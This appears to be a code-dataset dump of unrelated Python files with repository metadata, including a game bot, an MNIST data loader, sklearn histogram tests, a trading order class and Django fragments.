#out = [0, 0, 0]
#virtual 'friction'
'''kF = .5
vel = [s_ship.posx-s_ship.velx, s_ship.posy-s_ship.vely]
mvel = math.sqrt(s_ship.velx**2 + s_ship.vely**2)
vel = self.normalize(vel)
tmp = self.accelerateTo(s_ship, vel[0], vel[1], kF)
out[0] += tmp[0]*(mvel/30)
out[1] += tmp[1]*(mvel/30)
out[2] += tmp[2]*(mvel/30)'''
#Emergency overwrite - in case of iminent danger
rotation_out = 0
if rock_less <= 1:
out_s = 1
gamestate.log("Overwriting controls: rock 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateRock(gamestate.rocks[rock_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if rock_less <= .5:
gamestate.log("Overwriting controls: rock .5 of ID " + str(rock_less_uid))
shp = self.estimateShip(s_ship, rock_less)
rck = self.estimateRock(gamestate.rocks[rock_less_uid], rock_less)
out = self.accelerateTo(shp, 2*shp.posx - rck.posx, 2*shp.posy - rck.posy)
out = self.normalize(out)
out = self.invert(out)
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
if laser_less <= 1.5:
out_s = 1
gamestate.log("Overwriting controls: laser 1s of ID " + str(laser_less_uid))
shipp = self.estimateShip(s_ship, self.step)
targetp = self.estimateLaser(gamestate.lasers[laser_less_uid], self.step)
prediction = self.predShoot(shipp, targetp, 25, gamestate)
if prediction is not None:
time, coords = prediction
rotation_out = self.lookAt(shipp, math.atan2(shipp.posx - coords[0],coords[1] - shipp.posy ))
if laser_less <= .5:
gamestate.log("Overwriting controls: laser .5 of ID " + str(laser_less_uid))
shp = self.estimateShip(s_ship, laser_less)
lsr = self.estimateLaser(gamestate.lasers[laser_less_uid], laser_less)
out = self.accelerateTo(s_ship, 2*shp.posx - lsr.posx, 2*shp.posy - lsr.posy)
out = self.normalize(out)
out = self.invert(out)
#@out[0] = -out[0]
out[1] += rotation_out*rotmulti
out[2] += -rotation_out*rotmulti
mx = max(abs(out[0]), abs(out[1]), abs(out[2]))
if mx != 0:
mx = 1/mx
return Action(-out[0]*mx, out[1]*mx, out[2]*mx, out_s)
gamestate.log(str(s_ship.vely))
return Action(1, 0, 0, 0)
GameState(SeijiBot()).connect()
| 37.884615
| 608
| 0.496853
| 24,550
| 0.996954
| 0
| 0
| 0
| 0
| 0
| 0
| 2,049
| 0.083208
|
c41f3f30efc1128fe0e35981a452b93b464ce15f
| 304
|
py
|
Python
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 33
|
2021-12-15T07:11:47.000Z
|
2022-03-29T08:58:32.000Z
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | 3
|
2021-12-15T11:39:54.000Z
|
2022-03-29T07:24:23.000Z
|
configs/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_09_10PottedMeatCan.py
|
THU-DA-6D-Pose-Group/self6dpp
|
c267cfa55e440e212136a5e9940598720fa21d16
|
[
"Apache-2.0"
] | null | null | null |
_base_ = "./resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO_01_02MasterChefCan.py"
OUTPUT_DIR = (
"output/gdrn/ycbvPbrSO/resnest50d_AugCosyAAEGray_BG05_visib10_mlBCE_DoubleMask_ycbvPbr100e_SO/09_10PottedMeatCan"
)
DATASETS = dict(TRAIN=("ycbv_010_potted_meat_can_train_pbr",))
| 50.666667
| 117
| 0.871711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 245
| 0.805921
|
c41fd9dec58d9f797e213eba1e8064f8aba14576
| 682
|
py
|
Python
|
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
days/01-03-datetimes/code/100day_calc.py
|
rhelmstedter/100daysofcode-with-python-course
|
076c99939b5641be541023f61c10ff30a7f05524
|
[
"MIT"
] | null | null | null |
from datetime import date, datetime, timedelta
import time
START_DATE = date(2021, 5, 25)
duration = timedelta(days=100)
# Assumption: the original snippet referenced LAST_DAY_OF_SCHOOL without defining
# it, so it is derived here from START_DATE + duration so that countdown() can run.
LAST_DAY_OF_SCHOOL = datetime.combine(START_DATE + duration, datetime.min.time())
def countdown():
    event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print()
print("\tTime until school is out for summer 2021:", end="\n\n")
while event_delta.seconds > 0:
hours, remaining_delta = divmod(event_delta.seconds, 3600)
mins, secs = divmod(remaining_delta, 60)
timer = f"\t{event_delta.days:02d} days {hours:02d} hours {mins:02d} minutes {secs:02d} seconds"
print(timer, end="\r")
time.sleep(1)
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print("School's out for summer!")
| 32.47619
| 104
| 0.668622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.247801
|
c42001c4593f0af28c9a44cdd561459d12ab258c
| 195
|
py
|
Python
|
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
output/copilot/python/timeout/palindrome-partitioning.py
|
nhtnhan/CMPUT663-copilot-eval
|
896711d006eb37a78e010cd1b9f79dc285ad054d
|
[
"Apache-2.0"
] | null | null | null |
# https://leetcode.com/problems/palindrome-partitioning/
class Solution(object):
def partition(self, s):
"""
:type s: str
:rtype: List[List[str]]
"""
| 21.666667
| 56
| 0.54359
| 128
| 0.65641
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.635897
|
c42012e1044d2e28166a8361142bd8a07f4789f3
| 6,071
|
py
|
Python
|
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
aggregathor/ea_datasource.py
|
big-data-lab-umbc/autodist
|
c8514b27cf5608f35254b63c4ac8093c7295a8e7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import keras
import random
from keras.datasets import mnist
from keras import backend as K
K.set_floatx('float64')
class DataSource(object):
def __init__(self):
raise NotImplementedError()
def partitioned_by_rows(self, num_workers, test_reserve=.3):
raise NotImplementedError()
def sample_single_non_iid(self, weight=None):
raise NotImplementedError()
class Mnist(DataSource):
IID = True
MAX_NUM_CLASSES_PER_CLIENT = 10
TRAIN_VALID_DATA_RANGE = np.array([800,800])
CLASSES = range(10)
# def __init__(self, train_range = (0.7 * TRAIN_VALID_DATA_RANGE).astype(int),
# valid_range = (0.3 * TRAIN_VALID_DATA_RANGE).astype(int),
# test_range = [80,120]):
# train:valid:test = 800:400:100
def __init__(self, train_range = (TRAIN_VALID_DATA_RANGE).astype(int),
valid_range = (0.5 * TRAIN_VALID_DATA_RANGE).astype(int),
test_range = [100,100]):
train_size = random.randint(train_range[0], train_range[1])
test_size = random.randint(test_range[0], test_range[1])
valid_size = random.randint(valid_range[0], valid_range[1])
#(x_train, y_train), (x_test, y_test) = mnist.load_data()
mnistdata = np.load('./mnist.npz')
x_train = mnistdata['x_train'].astype('float64')
y_train = mnistdata['y_train'].astype('float64')
x_test = mnistdata['x_test'].astype('float64')
y_test = mnistdata['y_test'].astype('float64')
total_train_size, total_test_size = x_train.shape[0], x_test.shape[0]
total_valid_size = int(total_train_size * .3)
total_train_size = int(total_train_size * .7)
if Mnist.IID:
train_sample_idx = np.random.choice(total_train_size, train_size,replace=True)
valid_sample_idx = np.random.choice(range(total_train_size, total_train_size + total_valid_size), valid_size, replace=True)
test_sample_idx = np.random.choice(total_test_size, test_size, replace=True)
else:
label_w = self.gen_dummy_non_iid_weights()
# print('label_w', label_w)
train_weights = self.gen_sample_weights(y_train, label_w)
valid_weights = train_weights[total_train_size:] / np.sum(train_weights[total_train_size:])
train_weights = train_weights[0:total_train_size] / np.sum(train_weights[0:total_train_size])
test_weights = self.gen_sample_weights(y_test, label_w)
train_sample_idx = np.random.choice(total_train_size, train_size,
replace=True, p=train_weights)
valid_sample_idx = np.random.choice(range(total_train_size, total_train_size + total_valid_size), valid_size,
replace=True, p=valid_weights)
test_sample_idx = np.random.choice(total_test_size, test_size,
replace=True, p=test_weights)
self.x_train, self.y_train = Mnist.post_process(
x_train[train_sample_idx], y_train[train_sample_idx])
self.x_valid, self.y_valid= Mnist.post_process(
x_train[valid_sample_idx], y_train[valid_sample_idx])
self.x_test, self.y_test = Mnist.post_process(
x_test[test_sample_idx], y_test[test_sample_idx])
print('train', self.x_train.shape, self.y_train.shape,
'valid', self.x_valid.shape, 'test', self.x_test.shape)
def gen_sample_weights(self,labels, label_w):
size_per_class = np.array([np.sum(labels == i) for i in Mnist.CLASSES])
label_w = np.divide(label_w, size_per_class)
sample_w = np.zeros(labels.shape[0])
sample_w[labels] = label_w
sample_w /= np.sum(sample_w)
return sample_w
def gen_dummy_non_iid_weights(self):
num_classes_this_client = random.randint(1, Mnist.MAX_NUM_CLASSES_PER_CLIENT + 1)
classes_this_client = np.random.choice(Mnist.CLASSES, num_classes_this_client)
w = np.random.rand(num_classes_this_client)
weights = np.zeros(len(Mnist.CLASSES))
weights[classes_this_client] = w
return weights
# assuming client server already agreed on data format
def post_process(x, y):
if K.image_data_format() == 'channels_first':
sample_shape = (1, ) + x.shape[1:]
else:
sample_shape = x.shape[1:] + (1, )
x = x.reshape((x.shape[0],) + sample_shape)
y_vec = keras.utils.to_categorical(y, len(Mnist.CLASSES))
return x / 255., y_vec
# split evenly into exact num_workers chunks, with test_reserve globally
def partitioned_by_rows(self, num_workers, test_reserve=.3):
n_test = int(self.x.shape[0] * test_reserve)
n_train = self.x.shape[0] - n_test
nums = [n_train // num_workers] * num_workers
nums[-1] += n_train % num_workers
idxs = np.array([np.random.choice(np.arange(n_train), num, replace=False) for num in nums])
return {
# (size_partition * 28 * 28, size_partition * 1) * num_partitions
"train": [post_process(self.x[idx], self.y[idx]) for idx in idxs],
# (n_test * 28 * 28, n_test * 1)
"test": post_process(self.x[np.arange(n_train, n_train + n_test)], self.y[np.arange(n_train, n_train + n_test)])
}
# generate t, t, v dataset given distribution and split
def fake_non_iid_data(self, min_train=100, max_train=1000, data_split=(.6,.3,.1)):
return ((self.x_train, self.y_train),
(self.x_test, self.y_test),
(self.x_valid, self.y_valid))
if __name__ == "__main__":
# m = Mnist()
# # res = m.partitioned_by_rows(9)
# # print(res["test"][1].shape)
# for _ in range(10):
# print(m.gen_dummy_non_iid_weights())
fake_data = Mnist().fake_non_iid_data(min_train=10,max_train=10,data_split=(0.6, 0.3, 0.1))
train_data, test_data, valid_data = fake_data
x_train, y_train = train_data
x_test, y_test = test_data
x_valid, y_valid = valid_data
print(y_valid)
| 43.056738
| 135
| 0.653434
| 5,472
| 0.901334
| 0
| 0
| 0
| 0
| 0
| 0
| 864
| 0.142316
|
c42094cad42afee256fee1fad8338f794ac45419
| 255
|
py
|
Python
|
proxySTAR_V3/certbot/venv/lib/python2.7/site-packages/pylint/test/functional/pygtk_enum_crash.py
|
mami-project/lurk
|
98c293251e9b1e9c9a4b02789486c5ddaf46ba3c
|
[
"Apache-2.0"
] | 2
|
2017-07-05T09:57:33.000Z
|
2017-11-14T23:05:53.000Z
|
Libraries/Python/pylint/v1.4.4/pylint/test/functional/pygtk_enum_crash.py
|
davidbrownell/Common_Environment
|
4015872aeac8d5da30a6aa7940e1035a6aa6a75d
|
[
"BSL-1.0"
] | 1
|
2019-01-17T14:26:22.000Z
|
2019-01-17T22:56:26.000Z
|
Libraries/Python/pylint/v1.4.4/pylint/test/functional/pygtk_enum_crash.py
|
davidbrownell/Common_Environment
|
4015872aeac8d5da30a6aa7940e1035a6aa6a75d
|
[
"BSL-1.0"
] | 1
|
2017-08-31T14:33:03.000Z
|
2017-08-31T14:33:03.000Z
|
# pylint: disable=C0121
"""http://www.logilab.org/ticket/124337"""
import gtk
def print_some_constant(arg=gtk.BUTTONS_OK):
"""crash because gtk.BUTTONS_OK, a gtk enum type, is returned by
astroid as a constant
"""
print(arg)
| 21.25
| 69
| 0.662745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 166
| 0.65098
|
c4231b8d3eab02f60fcc36025477bf600813aa38
| 1,519
|
py
|
Python
|
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | null | null | null |
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | null | null | null |
py_at/OrderItem.py
|
kanghua309/at_py
|
8fa7943a9de52cd81d235f06b57a25aa07fb715b
|
[
"Apache-2.0"
] | 2
|
2018-09-19T16:07:26.000Z
|
2019-11-09T15:46:21.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'HaiFeng'
__mtime__ = '2016/8/16'
"""
import time
from py_at.EnumDefine import *
########################################################################
class OrderItem(object):
"""策略信号"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.Instrument = ''
        self.DateTime = time.strftime('%Y%m%d %H:%M:%S', time.localtime(time.time()))
self.Direction = Direction.Buy
self.Offset = Offset.Open
self.Price = 0.0
self.Volume = 0
self.Remark = ''
self.RelationOpenOrders = []
        # strategy-related fields
self.AvgEntryPriceShort = 0.0
self.AvgEntryPriceLong = 0.0
self.PositionLong = 0
self.PositionShort = 0
self.EntryDateLong = ''
self.EntryPriceLong = 0.0
self.ExitDateShort = ''
self.ExitPriceShort = 0.0
self.EntryDateShort = ''
self.EntryPriceShort = 0.0
self.ExitDateLong = ''
self.ExitPriceLong = 0.0
self.LastEntryDateShort = ''
self.LastEntryPriceShort = 0.0
self.LastEntryDateLong = ''
self.LastEntryPriceLong = 0.0
self.IndexEntryLong = -1
self.IndexEntryShort = -1
self.IndexLastEntryLong = -1
self.IndexLastEntryShort = -1
self.IndexExitLong = -1
self.IndexExitShort = -1
#----------------------------------------------------------------------
def __str__(self):
""""""
return '{self.Instrument}, {self.DateTime}, {self.Direction}, {self.Offset}, {self.Price}, {self.Volume}, {self.Remark}'.format(self = self)
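# Editor's sketch (not part of the original module): minimal usage of OrderItem, assuming
# the Direction/Offset enums imported from py_at.EnumDefine expose Buy/Open as used above.
# The instrument name and numbers are illustrative values only.
if __name__ == '__main__':
    demo = OrderItem()
    demo.Instrument = 'demo_instrument'
    demo.Price = 3500.0
    demo.Volume = 2
    demo.Remark = 'demo signal'
    print(demo)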
| 26.649123
| 142
| 0.578012
| 1,301
| 0.847557
| 0
| 0
| 0
| 0
| 0
| 0
| 528
| 0.343974
|
c4246529ebfd4899aa1216798277f3b74d90b3f5
| 547
|
py
|
Python
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 3
|
2021-02-28T00:52:53.000Z
|
2021-03-01T06:23:33.000Z
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 36
|
2018-08-22T19:44:03.000Z
|
2020-05-09T10:02:36.000Z
|
pyscf/nao/m_rf_den.py
|
mfkasim1/pyscf
|
7be5e015b2b40181755c71d888449db936604660
|
[
"Apache-2.0"
] | 4
|
2018-02-14T16:28:28.000Z
|
2019-08-12T16:40:30.000Z
|
from __future__ import print_function, division
import numpy as np
from numpy import identity, dot, zeros, zeros_like
def rf_den_via_rf0(self, rf0, v):
""" Whole matrix of the interacting response via non-interacting response and interaction"""
rf = zeros_like(rf0)
I = identity(rf0.shape[1])
for ir,r in enumerate(rf0):
rf[ir] = dot(np.linalg.inv(I-dot(r,v)), r)
return rf
def rf_den(self, ww):
""" Full matrix interacting response from NAO GW class"""
rf0 = self.rf0(ww)
return rf_den_via_rf0(self, rf0, self.kernel_sq)
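# Editor's sketch (not part of the original file): a small self-check on random test
# matrices that rf_den_via_rf0 indeed solves the Dyson-like relation
# rf = rf0 + rf0 @ v @ rf at every frequency point (self is unused, so None is passed).
if __name__ == '__main__':
    nw, n = 3, 4
    rf0_test = 0.1 * np.random.rand(nw, n, n)
    v_test = 0.1 * np.random.rand(n, n)
    rf_test = rf_den_via_rf0(None, rf0_test, v_test)
    for r0, r in zip(rf0_test, rf_test):
        assert np.allclose(r, r0 + dot(dot(r0, v_test), r))
    print('Dyson relation satisfied for all frequency points')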
| 28.789474
| 94
| 0.718464
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.272395
|
c4253c3edd906a40552637d516df1601047e0dd5
| 669
|
py
|
Python
|
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | 3
|
2019-09-02T11:26:58.000Z
|
2019-12-06T15:54:38.000Z
|
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | null | null | null |
app/model/compare_users.py
|
dwdraugr/YADS
|
c8036d8196a3158636aaa4f1910033e70ec8ecb4
|
[
"Apache-2.0"
] | null | null | null |
from app.model.model import Model
class CompareUsers(Model):
def get_compare_users(self, uid):
cursor = self.matchadb.cursor()
cursor.execute('SELECT whomid FROM likes WHERE whoid = %s', (uid,))
whomids = [item[0] for item in cursor.fetchall()]
if len(whomids) == 0:
raise ValueError('Likes not found')
result = list()
for whomid in whomids:
cursor.execute('SELECT whomid FROM likes WHERE whoid = %s AND '
'whomid = %s', (uid, whomid))
            r = cursor.fetchone()
            # a row is returned only when the like is mutual (both directions exist)
            if r is not None:
                result.append(r[0])
return result
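# Editor's note (not part of the original model): get_compare_users returns the ids of
# users whose like is reciprocated, i.e. a "match" list. Intended usage (illustrative,
# assumes a configured `matchadb` connection on the Model base class and a
# likes(whoid, whomid) table):
#   matches = CompareUsers().get_compare_users(uid)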
| 35.210526
| 75
| 0.560538
| 632
| 0.944694
| 0
| 0
| 0
| 0
| 0
| 0
| 121
| 0.180867
|
c425a0389a78978ea2d9dbb437a26224ad54fcc9
| 9,004
|
py
|
Python
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 25
|
2019-03-08T01:03:03.000Z
|
2022-02-14T17:38:32.000Z
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 9
|
2020-09-25T22:32:02.000Z
|
2022-02-09T23:45:10.000Z
|
venv/Lib/site-packages/sklearn/ensemble/_hist_gradient_boosting/tests/test_histogram.py
|
mokshagna517/recommendation_sys
|
bc8ced225dff3c93d619ff5da363f42d0aa0676c
|
[
"MIT"
] | 31
|
2019-01-15T20:16:50.000Z
|
2022-03-01T05:47:38.000Z
|
import numpy as np
import pytest
from numpy.testing import assert_allclose
from numpy.testing import assert_array_equal
from sklearn.ensemble._hist_gradient_boosting.histogram import (
_build_histogram_naive,
_build_histogram,
_build_histogram_no_hessian,
_build_histogram_root_no_hessian,
_build_histogram_root,
_subtract_histograms
)
from sklearn.ensemble._hist_gradient_boosting.types import HISTOGRAM_DTYPE
from sklearn.ensemble._hist_gradient_boosting.types import G_H_DTYPE
from sklearn.ensemble._hist_gradient_boosting.types import X_BINNED_DTYPE
@pytest.mark.parametrize(
'build_func', [_build_histogram_naive, _build_histogram])
def test_build_histogram(build_func):
binned_feature = np.array([0, 2, 0, 1, 2, 0, 2, 1], dtype=X_BINNED_DTYPE)
# Small sample_indices (below unrolling threshold)
ordered_gradients = np.array([0, 1, 3], dtype=G_H_DTYPE)
ordered_hessians = np.array([1, 1, 2], dtype=G_H_DTYPE)
sample_indices = np.array([0, 2, 3], dtype=np.uint32)
hist = np.zeros((1, 3), dtype=HISTOGRAM_DTYPE)
build_func(0, sample_indices, binned_feature, ordered_gradients,
ordered_hessians, hist)
hist = hist[0]
assert_array_equal(hist['count'], [2, 1, 0])
assert_allclose(hist['sum_gradients'], [1, 3, 0])
assert_allclose(hist['sum_hessians'], [2, 2, 0])
# Larger sample_indices (above unrolling threshold)
sample_indices = np.array([0, 2, 3, 6, 7], dtype=np.uint32)
ordered_gradients = np.array([0, 1, 3, 0, 1], dtype=G_H_DTYPE)
ordered_hessians = np.array([1, 1, 2, 1, 0], dtype=G_H_DTYPE)
hist = np.zeros((1, 3), dtype=HISTOGRAM_DTYPE)
build_func(0, sample_indices, binned_feature, ordered_gradients,
ordered_hessians, hist)
hist = hist[0]
assert_array_equal(hist['count'], [2, 2, 1])
assert_allclose(hist['sum_gradients'], [1, 4, 0])
assert_allclose(hist['sum_hessians'], [2, 2, 1])
def test_histogram_sample_order_independence():
# Make sure the order of the samples has no impact on the histogram
# computations
rng = np.random.RandomState(42)
n_sub_samples = 100
n_samples = 1000
n_bins = 256
binned_feature = rng.randint(0, n_bins - 1, size=n_samples,
dtype=X_BINNED_DTYPE)
sample_indices = rng.choice(np.arange(n_samples, dtype=np.uint32),
n_sub_samples, replace=False)
ordered_gradients = rng.randn(n_sub_samples).astype(G_H_DTYPE)
hist_gc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_gc)
ordered_hessians = rng.exponential(size=n_sub_samples).astype(G_H_DTYPE)
hist_ghc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_ghc)
permutation = rng.permutation(n_sub_samples)
hist_gc_perm = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_no_hessian(0, sample_indices[permutation],
binned_feature, ordered_gradients[permutation],
hist_gc_perm)
hist_ghc_perm = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram(0, sample_indices[permutation], binned_feature,
ordered_gradients[permutation],
ordered_hessians[permutation], hist_ghc_perm)
hist_gc = hist_gc[0]
hist_ghc = hist_ghc[0]
hist_gc_perm = hist_gc_perm[0]
hist_ghc_perm = hist_ghc_perm[0]
assert_allclose(hist_gc['sum_gradients'], hist_gc_perm['sum_gradients'])
assert_array_equal(hist_gc['count'], hist_gc_perm['count'])
assert_allclose(hist_ghc['sum_gradients'], hist_ghc_perm['sum_gradients'])
assert_allclose(hist_ghc['sum_hessians'], hist_ghc_perm['sum_hessians'])
assert_array_equal(hist_ghc['count'], hist_ghc_perm['count'])
@pytest.mark.parametrize("constant_hessian", [True, False])
def test_unrolled_equivalent_to_naive(constant_hessian):
# Make sure the different unrolled histogram computations give the same
# results as the naive one.
rng = np.random.RandomState(42)
n_samples = 10
n_bins = 5
sample_indices = np.arange(n_samples).astype(np.uint32)
binned_feature = rng.randint(0, n_bins - 1, size=n_samples, dtype=np.uint8)
ordered_gradients = rng.randn(n_samples).astype(G_H_DTYPE)
if constant_hessian:
ordered_hessians = np.ones(n_samples, dtype=G_H_DTYPE)
else:
ordered_hessians = rng.lognormal(size=n_samples).astype(G_H_DTYPE)
hist_gc_root = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_ghc_root = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_gc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_ghc = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_naive = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_build_histogram_root_no_hessian(0, binned_feature,
ordered_gradients, hist_gc_root)
_build_histogram_root(0, binned_feature, ordered_gradients,
ordered_hessians, hist_ghc_root)
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_gc)
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_ghc)
_build_histogram_naive(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_naive)
hist_naive = hist_naive[0]
hist_gc_root = hist_gc_root[0]
hist_ghc_root = hist_ghc_root[0]
hist_gc = hist_gc[0]
hist_ghc = hist_ghc[0]
for hist in (hist_gc_root, hist_ghc_root, hist_gc, hist_ghc):
assert_array_equal(hist['count'], hist_naive['count'])
assert_allclose(hist['sum_gradients'], hist_naive['sum_gradients'])
for hist in (hist_ghc_root, hist_ghc):
assert_allclose(hist['sum_hessians'], hist_naive['sum_hessians'])
for hist in (hist_gc_root, hist_gc):
assert_array_equal(hist['sum_hessians'], np.zeros(n_bins))
@pytest.mark.parametrize("constant_hessian", [True, False])
def test_hist_subtraction(constant_hessian):
# Make sure the histogram subtraction trick gives the same result as the
# classical method.
rng = np.random.RandomState(42)
n_samples = 10
n_bins = 5
sample_indices = np.arange(n_samples).astype(np.uint32)
binned_feature = rng.randint(0, n_bins - 1, size=n_samples, dtype=np.uint8)
ordered_gradients = rng.randn(n_samples).astype(G_H_DTYPE)
if constant_hessian:
ordered_hessians = np.ones(n_samples, dtype=G_H_DTYPE)
else:
ordered_hessians = rng.lognormal(size=n_samples).astype(G_H_DTYPE)
hist_parent = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices, binned_feature,
ordered_gradients, hist_parent)
else:
_build_histogram(0, sample_indices, binned_feature,
ordered_gradients, ordered_hessians, hist_parent)
    mask = rng.randint(0, 2, n_samples).astype(bool)
sample_indices_left = sample_indices[mask]
ordered_gradients_left = ordered_gradients[mask]
ordered_hessians_left = ordered_hessians[mask]
hist_left = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices_left,
binned_feature, ordered_gradients_left,
hist_left)
else:
_build_histogram(0, sample_indices_left, binned_feature,
ordered_gradients_left, ordered_hessians_left,
hist_left)
sample_indices_right = sample_indices[~mask]
ordered_gradients_right = ordered_gradients[~mask]
ordered_hessians_right = ordered_hessians[~mask]
hist_right = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
if constant_hessian:
_build_histogram_no_hessian(0, sample_indices_right,
binned_feature, ordered_gradients_right,
hist_right)
else:
_build_histogram(0, sample_indices_right, binned_feature,
ordered_gradients_right, ordered_hessians_right,
hist_right)
hist_left_sub = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
hist_right_sub = np.zeros((1, n_bins), dtype=HISTOGRAM_DTYPE)
_subtract_histograms(0, n_bins, hist_parent, hist_right, hist_left_sub)
_subtract_histograms(0, n_bins, hist_parent, hist_left, hist_right_sub)
for key in ('count', 'sum_hessians', 'sum_gradients'):
assert_allclose(hist_left[key], hist_left_sub[key], rtol=1e-6)
assert_allclose(hist_right[key], hist_right_sub[key], rtol=1e-6)
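# Editor's sketch (not part of the upstream test file): the idea behind the subtraction
# trick exercised above, in plain numpy over the structured HISTOGRAM_DTYPE arrays --
# a child's histogram is the parent's histogram minus the sibling's, field by field.
def _manual_subtract(parent, sibling):
    child = np.zeros_like(parent)
    for key in ('count', 'sum_gradients', 'sum_hessians'):
        child[key] = parent[key] - sibling[key]
    return child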
| 44.35468
| 79
| 0.691804
| 0
| 0
| 0
| 0
| 6,359
| 0.706242
| 0
| 0
| 729
| 0.080964
|
c425a78347ab246234b9b4acc34bdb1ab5a3665b
| 349
|
py
|
Python
|
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | 1
|
2018-04-28T17:06:23.000Z
|
2018-04-28T17:06:23.000Z
|
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | null | null | null |
dgpolygon/gmappolygons/urls.py
|
mariohmol/django-google-polygon
|
9d9448e540a4d100d925d7170425143f126e2174
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from gmappolygons import views
urlpatterns = patterns('',
